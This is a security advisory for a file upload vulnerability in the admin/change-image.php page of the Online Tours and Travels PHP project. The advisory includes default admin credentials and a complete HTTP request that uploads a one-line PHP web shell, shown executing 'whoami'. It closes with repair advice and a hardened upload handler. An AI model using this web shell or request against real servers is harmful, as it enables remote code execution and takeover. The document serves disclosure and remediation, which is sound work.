projectworlds Online Tours and Travels Project V1.0 admin/change-image.php File upload vulnerability
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
- File upload vulnerability
Root Cause
- A file upload vulnerability was identified within the "admin/change-image.php" file of the "Online Tours and Travels Project" project. The root cause lies in the fact that attackers can upload malicious files via the parameter "submit". This input is not properly validated or restricted in terms of file type, size, or content. As a result, attackers are able to upload arbitrary files, including web shells, which may lead to remote code execution.
Impact
- Exploiting this file upload vulnerability allows attackers to upload and execute malicious files on the server, potentially leading to complete system compromise, data theft, service disruption, and unauthorized access. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "Online Tours and Travels Project", I detected a critical file upload vulnerability in the "admin/change-image.php" file. This vulnerability is attributed to the insufficient validation of user-supplied files for the "submit" parameter. This inadequacy enables attackers to upload malicious files without proper restrictions. Consequently, attackers can achieve remote code execution, modify or delete files, and gain control over the system. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
Obtain a valid authentication session by logging in with administrator credentials (Username: admin, Password: admin).
Vulnerability details and POC
Vulnerability location:
Payload:
http://192.168.0.164/Tours-and-travels-in-php-master/admin/pacakgeimages/config.php?cmd=whoami
win-2vie4jropin\edy
Vulnerability Request Packet
POST /Tours-and-travels-in-php-master/admin/change-image.php HTTP/1.1
Host: 192.168.0.164
Content-Length: 321
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.164
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxCP0yqnZzT80bUFh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.164/Tours-and-travels-in-php-master/admin/change-image.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=98r2omt2mmk0e8sgi6hf418q93
Connection: keep-alive
------WebKitFormBoundaryxCP0yqnZzT80bUFh
Content-Disposition: form-data; name="packageimage"; filename="config.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryxCP0yqnZzT80bUFh
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundaryxCP0yqnZzT80bUFh--
The following are screenshots of some specific information obtained from testing and running:
Suggested repair
- Implement strict file type validation: Restrict allowed file types to a whitelist of safe extensions and MIME types. Do not rely solely on client-side validation.
- Validate file content: Check the actual content of the uploaded file to ensure it matches the expected type. Use server-side checks to prevent file type spoofing.
- Rename uploaded files: Generate a random filename for each uploaded file to prevent direct access and path traversal attacks.
- Store files outside the web root: If possible, store uploaded files in a directory that is not directly accessible via the web. Serve them through a secure script that controls access.
- Limit file size: Implement maximum file size limits to prevent denial-of-service attacks via large uploads.
- Use secure permissions: Ensure that uploaded files have minimal permissions and cannot be executed as code unless explicitly intended.
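The six repair points above, combined into one hardened upload handler. This is an added example written for this advisory; it is not code from the Online Tours and Travels project and does not reproduce its admin/change-image.php. The form field name "packageimage" is taken from the request packet above; the upload directory, the 2 MiB size cap, the allowed image types and the function name storePackageImage are assumptions chosen for illustration.

```php
<?php
// Added example (not project code): a hardened replacement for the upload
// handling described in the advisory. UPLOAD_DIR, MAX_BYTES, ALLOWED and
// storePackageImage() are assumed names/values for illustration.

declare(strict_types=1);

// Assumption: a directory that is NOT under the web root, so nothing stored
// here can be requested (or executed) directly by URL.
const UPLOAD_DIR = '/var/app/uploads/packageimages';
const MAX_BYTES  = 2 * 1024 * 1024; // assumed 2 MiB cap against oversized uploads

// Whitelist: allowed extension => MIME type that must be detected from content.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate and store one entry of $_FILES. Returns the server-chosen
 * filename on success, throws RuntimeException with the rejection reason.
 */
function storePackageImage(array $file): string
{
    // 1. Upload sanity: PHP reported success, size is bounded, and the path
    //    really is a temporary upload (not an arbitrary local file).
    $err = (int)($file['error'] ?? UPLOAD_ERR_NO_FILE);
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . $err);
    }
    if ((int)$file['size'] > MAX_BYTES) {
        throw new RuntimeException('File exceeds size limit');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not a genuine uploaded file');
    }

    // 2. Extension whitelist on the client-supplied name. Anything not in
    //    ALLOWED (for example "config.php") is rejected here.
    $ext = strtolower(pathinfo((string)$file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('Extension not allowed');
    }

    // 3. Content validation: the MIME type comes from the bytes on disk,
    //    never from the client's Content-Type part header, and must agree
    //    with the extension. getimagesize() additionally parses the image
    //    header, so a PHP script labelled image/jpeg fails this step.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = (string)$finfo->file($file['tmp_name']);
    if ($detected !== ALLOWED[$ext]) {
        throw new RuntimeException('Detected type ' . $detected . ' does not match extension');
    }
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // 4. Random server-chosen name: the client's filename never reaches the
    //    filesystem, which removes path traversal and double-extension tricks.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . DIRECTORY_SEPARATOR . $stored;

    // 5. Move into the non-web directory and leave no execute bits.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);

    return $stored;
}

// Handler wiring (assumed): authentication/session checks for the admin area
// are expected to run before this point, as the advisory's PoC requires a
// logged-in administrator.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['packageimage'])) {
    try {
        $name = storePackageImage($_FILES['packageimage']);
        echo 'Stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Applied to the request packet in this advisory, the upload is rejected at step 2 (the extension "php" is not whitelisted); had the attacker renamed the file to config.jpg, step 3 rejects it because finfo reports text/x-php rather than image/jpeg and getimagesize() fails. Because stored files live outside the web root, a separate read-only script (not shown) must stream them back with a fixed image Content-Type; it should look files up only by the random name returned here, never by a client-supplied path.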